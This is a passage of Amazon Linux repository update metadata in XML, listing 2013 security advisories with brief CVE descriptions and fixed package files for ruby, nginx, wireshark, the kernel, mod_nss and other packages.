arch="i686"><filename>Packages/ruby19-doc-1.9.3.484-31.55.amzn1.i686.rpm</filename></package><package name="ruby19-devel" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-devel-1.9.3.484-31.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-248</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-248: critical priority package update for ruby</title><issued date="2013-11-22 21:42:00" /><updated date="2014-09-16 21:54:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4164:
1033460:
CVE-2013-4164 ruby: heap overflow in floating point parsing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4164" title="" id="CVE-2013-4164" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby-debuginfo" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-debuginfo-1.8.7.374-2.11.amzn1.x86_64.rpm</filename></package><package name="ruby-devel" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-devel-1.8.7.374-2.11.amzn1.x86_64.rpm</filename></package><package name="ruby-libs" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-libs-1.8.7.374-2.11.amzn1.x86_64.rpm</filename></package><package name="ruby-rdoc" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby-rdoc-1.8.7.374-2.11.amzn1.noarch.rpm</filename></package><package name="ruby-ri" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-ri-1.8.7.374-2.11.amzn1.x86_64.rpm</filename></package><package name="ruby-static" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-static-1.8.7.374-2.11.amzn1.x86_64.rpm</filename></package><package name="ruby-irb" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby-irb-1.8.7.374-2.11.amzn1.noarch.rpm</filename></package><package name="ruby" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-1.8.7.374-2.11.amzn1.x86_64.rpm</filename></package><package name="ruby-debuginfo" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-debuginfo-1.8.7.374-2.11.amzn1.i686.rpm</filename></package><package name="ruby-devel" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-devel-1.8.7.374-2.11.amzn1.i686.rpm</filename></package><package name="ruby" version="1.8.7.374" 
release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-1.8.7.374-2.11.amzn1.i686.rpm</filename></package><package name="ruby-libs" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-libs-1.8.7.374-2.11.amzn1.i686.rpm</filename></package><package name="ruby-static" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-static-1.8.7.374-2.11.amzn1.i686.rpm</filename></package><package name="ruby-ri" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-ri-1.8.7.374-2.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-249</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-249: important priority package update for nginx</title><issued date="2013-12-02 20:27:00" /><updated date="2014-09-16 21:55:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4547:
nginx 0.8.41 through 1.4.3 and 1.5.x before 1.5.7 allows remote attackers to bypass intended restrictions via an unescaped space character in a URI.
1032266:
CVE-2013-4547 nginx: security restriction bypass flaw due to whitespace parsing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4547" title="" id="CVE-2013-4547" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx" version="1.4.3" release="1.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.4.3-1.14.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.4.3" release="1.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.4.3-1.14.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.4.3" release="1.14.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.4.3-1.14.amzn1.i686.rpm</filename></package><package name="nginx" version="1.4.3" release="1.14.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.4.3-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-250</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-250: low priority package update for augeas</title><issued date="2013-12-02 20:28:00" /><updated date="2014-09-16 21:55:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-0787:
Multiple flaws were found in the way Augeas handled configuration files when updating them. An application using Augeas to update configuration files in a directory that is writable by a different user (for example, an application running as root that is updating files in a directory owned by a non-root service user) could have been tricked into overwriting arbitrary files or leaking information via a symbolic link or mount point attack.
CVE-2012-0786:
Multiple flaws were found in the way Augeas handled configuration files when updating them. An application using Augeas to update configuration files in a directory that is writable by a different user (for example, an application running as root that is updating files in a directory owned by a non-root service user) could have been tricked into overwriting arbitrary files or leaking information via a symbolic link or mount point attack.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0786" title="" id="CVE-2012-0786" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0787" title="" id="CVE-2012-0787" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1537.html" title="" id="RHSA-2013:1537" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="augeas-devel" version="1.0.0" release="5.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/augeas-devel-1.0.0-5.5.amzn1.x86_64.rpm</filename></package><package name="augeas" version="1.0.0" release="5.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/augeas-1.0.0-5.5.amzn1.x86_64.rpm</filename></package><package name="augeas-debuginfo" version="1.0.0" release="5.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/augeas-debuginfo-1.0.0-5.5.amzn1.x86_64.rpm</filename></package><package name="augeas-libs" version="1.0.0" release="5.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/augeas-libs-1.0.0-5.5.amzn1.x86_64.rpm</filename></package><package name="augeas-libs" version="1.0.0" release="5.5.amzn1" epoch="0" arch="i686"><filename>Packages/augeas-libs-1.0.0-5.5.amzn1.i686.rpm</filename></package><package name="augeas-debuginfo" version="1.0.0" release="5.5.amzn1" epoch="0" arch="i686"><filename>Packages/augeas-debuginfo-1.0.0-5.5.amzn1.i686.rpm</filename></package><package name="augeas" version="1.0.0" release="5.5.amzn1" epoch="0" arch="i686"><filename>Packages/augeas-1.0.0-5.5.amzn1.i686.rpm</filename></package><package name="augeas-devel" version="1.0.0" release="5.5.amzn1" epoch="0" arch="i686"><filename>Packages/augeas-devel-1.0.0-5.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-251</id><title>Amazon Linux AMI 2012.09 - 
ALAS-2013-251: medium priority package update for wireshark</title><issued date="2013-12-02 20:29:00" /><updated date="2014-09-16 22:04:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-5721:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-4936:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-4935:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-4934:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-4933:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-4932:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-4931:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-4927:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-4083:
Two flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.
CVE-2013-4081:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-3561:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-3559:
Two flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.
CVE-2013-3557:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-6062:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-6061:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-6060:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-6059:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-6056:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-5600:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-5599:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-5598:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-5597:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-5595:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-4292:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-4291:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-4290:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-4289:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-4288:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-4285:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-3825:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-2392:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2392" title="" id="CVE-2012-2392" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3825" title="" id="CVE-2012-3825" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4285" title="" id="CVE-2012-4285" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4288" title="" id="CVE-2012-4288" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4289" title="" id="CVE-2012-4289" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4290" title="" id="CVE-2012-4290" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4291" title="" id="CVE-2012-4291" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4292" title="" id="CVE-2012-4292" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5595" title="" id="CVE-2012-5595" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5597" title="" id="CVE-2012-5597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5598" title="" id="CVE-2012-5598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5599" title="" id="CVE-2012-5599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5600" title="" id="CVE-2012-5600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6056" title="" id="CVE-2012-6056" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6059" title="" id="CVE-2012-6059" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6060" title="" id="CVE-2012-6060" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6061" title="" id="CVE-2012-6061" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6062" title="" id="CVE-2012-6062" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3557" title="" id="CVE-2013-3557" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3559" title="" id="CVE-2013-3559" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3561" title="" id="CVE-2013-3561" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4081" title="" id="CVE-2013-4081" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4083" title="" id="CVE-2013-4083" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4927" title="" id="CVE-2013-4927" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4931" title="" id="CVE-2013-4931" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4932" title="" id="CVE-2013-4932" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4933" title="" id="CVE-2013-4933" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4934" title="" id="CVE-2013-4934" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4935" title="" id="CVE-2013-4935" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4936" title="" id="CVE-2013-4936" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5721" title="" id="CVE-2013-5721" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1569.html" title="" id="RHSA-2013:1569" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package 
name="wireshark" version="1.8.10" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-1.8.10-4.12.amzn1.x86_64.rpm</filename></package><package name="wireshark-debuginfo" version="1.8.10" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-debuginfo-1.8.10-4.12.amzn1.x86_64.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-devel-1.8.10-4.12.amzn1.x86_64.rpm</filename></package><package name="wireshark" version="1.8.10" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-1.8.10-4.12.amzn1.i686.rpm</filename></package><package name="wireshark-debuginfo" version="1.8.10" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-debuginfo-1.8.10-4.12.amzn1.i686.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-devel-1.8.10-4.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-252</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-252: medium priority package update for kernel</title><issued date="2013-12-02 20:30:00" /><updated date="2014-09-16 22:04:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4470:
The Linux kernel before 3.12, when UDP Fragmentation Offload (UFO) is enabled, does not properly initialize certain data structures, which allows local users to cause a denial of service (memory corruption and system crash) or possibly gain privileges via a crafted application that uses the UDP_CORK option in a setsockopt system call and sends both short and long packets, related to the ip_ufo_append_data function in net/ipv4/ip_output.c and the ip6_ufo_append_data function in net/ipv6/ip6_output.c.
1023477:
CVE-2013-4470 Kernel: net: memory corruption with UDP_CORK and UFO
CVE-2013-4348:
The skb_flow_dissect function in net/core/flow_dissector.c in the Linux kernel through 3.12 allows remote attackers to cause a denial of service (infinite loop) via a small value in the IHL field of a packet with IPIP encapsulation.
1007939:
CVE-2013-4348 kernel: net: deadloop path in skb_flow_dissect()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4348" title="" id="CVE-2013-4348" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4470" title="" id="CVE-2013-4470" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="3.4.71" release="63.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.4.71-63.98.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.4.71" release="63.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.4.71-63.98.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.4.71" release="63.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.4.71-63.98.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.4.71" release="63.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.4.71-63.98.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.4.71" release="63.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.4.71-63.98.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.4.71" release="63.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.4.71-63.98.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.71" release="63.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.4.71-63.98.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.4.71" release="63.98.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.4.71-63.98.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.4.71" release="63.98.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.4.71-63.98.amzn1.i686.rpm</filename></package><package 
name="kernel-debuginfo-common-i686" version="3.4.71" release="63.98.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.4.71-63.98.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.4.71" release="63.98.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.4.71-63.98.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.71" release="63.98.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.4.71-63.98.amzn1.i686.rpm</filename></package><package name="kernel" version="3.4.71" release="63.98.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.4.71-63.98.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.4.71" release="63.98.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.4.71-63.98.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.4.71" release="63.98.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.4.71-63.98.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-253</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-253: medium priority package update for mod_nss</title><issued date="2013-12-03 13:00:00" /><updated date="2014-09-16 22:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4566:
A flaw was found in the way mod_nss handled the NSSVerifyClient setting for the per-directory context. When configured to not require a client certificate for the initial connection and only require it for a specific directory, mod_nss failed to enforce this requirement and allowed a client to access the directory when no valid client certificate was provided.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4566" title="" id="CVE-2013-4566" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1779.html" title="" id="RHSA-2013:1779" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_nss" version="1.0.8" release="19.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_nss-1.0.8-19.12.amzn1.x86_64.rpm</filename></package><package name="mod_nss-debuginfo" version="1.0.8" release="19.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_nss-debuginfo-1.0.8-19.12.amzn1.x86_64.rpm</filename></package><package name="mod_nss" version="1.0.8" release="19.12.amzn1" epoch="0" arch="i686"><filename>Packages/mod_nss-1.0.8-19.12.amzn1.i686.rpm</filename></package><package name="mod_nss-debuginfo" version="1.0.8" release="19.12.amzn1" epoch="0" arch="i686"><filename>Packages/mod_nss-debuginfo-1.0.8-19.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-254</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-254: medium priority package update for mod24_nss</title><issued date="2013-12-03 13:00:00" /><updated date="2014-09-16 22:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4566:
A flaw was found in the way mod_nss handled the NSSVerifyClient setting for the per-directory context. When configured to not require a client certificate for the initial connection and only require it for a specific directory, mod_nss failed to enforce this requirement and allowed a client to access the directory when no valid client certificate was provided.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4566" title="" id="CVE-2013-4566" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1779.html" title="" id="RHSA-2013:1779" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_nss" version="1.0.8" release="24.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_nss-1.0.8-24.17.amzn1.x86_64.rpm</filename></package><package name="mod24_nss-debuginfo" version="1.0.8" release="24.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_nss-debuginfo-1.0.8-24.17.amzn1.x86_64.rpm</filename></package><package name="mod24_nss-debuginfo" version="1.0.8" release="24.17.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_nss-debuginfo-1.0.8-24.17.amzn1.i686.rpm</filename></package><package name="mod24_nss" version="1.0.8" release="24.17.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_nss-1.0.8-24.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-255</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-255: important priority package update for 389-ds-base</title><issued date="2013-12-11 20:32:00" /><updated date="2014-09-16 22:05:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4485:
It was discovered that the 389 Directory Server did not properly handle certain Get Effective Rights (GER) search queries when the attribute list, which is a part of the query, included several names using the '@' character. An attacker able to submit search queries to the 389 Directory Server could cause it to crash.
389 Directory Server 1.2.11.15 (aka Red Hat Directory Server before 8.2.11-14) allows remote authenticated users to cause a denial of service (crash) via multiple @ characters in a GER attribute list in a search request.
1024552:
CVE-2013-4485 389-ds-base: DoS due to improper handling of ger attr searches
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4485" title="" id="CVE-2013-4485" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base" version="1.3.1.16" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.1.16-1.8.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.1.16" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.1.16-1.8.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.1.16" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.1.16-1.8.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.1.16" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.1.16-1.8.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.1.16" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.1.16-1.8.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.1.16" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.1.16-1.8.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.1.16" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.1.16-1.8.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.1.16" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.1.16-1.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-256</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-256: medium priority package update for openmpi</title><issued date="2013-12-11 20:32:00" /><updated 
date="2014-09-16 22:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2561:
OpenFabrics ibutils 1.5.7 allows local users to overwrite arbitrary files via a symlink attack on (1) ibdiagnet.db, (2) ibdiagnet.fdbs, (3) ibdiagnet_ibis.log, (4) ibdiagnet.log, (5) ibdiagnet.lst, (6) ibdiagnet.mcfdbs, (7) ibdiagnet.pkey, (8) ibdiagnet.psl, (9) ibdiagnet.slvl, or (10) ibdiagnet.sm in /tmp/.
A flaw was found in the way ibutils handled temporary files. A local attacker could use this flaw to cause arbitrary files to be overwritten as the root user via a symbolic link attack.
927430:
CVE-2013-2561 ibutils: insecure handling of files in the /tmp directory
CVE-2012-4516:
librdmacm 1.0.16, when ibacm.port is not specified, connects to port 6125, which allows remote attackers to specify the address resolution information for the application via a malicious ib_acm service.
It was discovered that librdmacm used a static port to connect to the ib_acm service. A local attacker able to run a specially crafted ib_acm service on that port could use this flaw to provide incorrect address resolution information to librdmacm applications.
865483:
CVE-2012-4516 librdmacm: Tried to connect to port 6125 if ibacm.port was not found
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4516" title="" id="CVE-2012-4516" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2561" title="" id="CVE-2013-2561" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openmpi-debuginfo" version="1.5.4" release="2.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/openmpi-debuginfo-1.5.4-2.24.amzn1.x86_64.rpm</filename></package><package name="openmpi" version="1.5.4" release="2.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/openmpi-1.5.4-2.24.amzn1.x86_64.rpm</filename></package><package name="openmpi-devel" version="1.5.4" release="2.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/openmpi-devel-1.5.4-2.24.amzn1.x86_64.rpm</filename></package><package name="openmpi-debuginfo" version="1.5.4" release="2.24.amzn1" epoch="0" arch="i686"><filename>Packages/openmpi-debuginfo-1.5.4-2.24.amzn1.i686.rpm</filename></package><package name="openmpi-devel" version="1.5.4" release="2.24.amzn1" epoch="0" 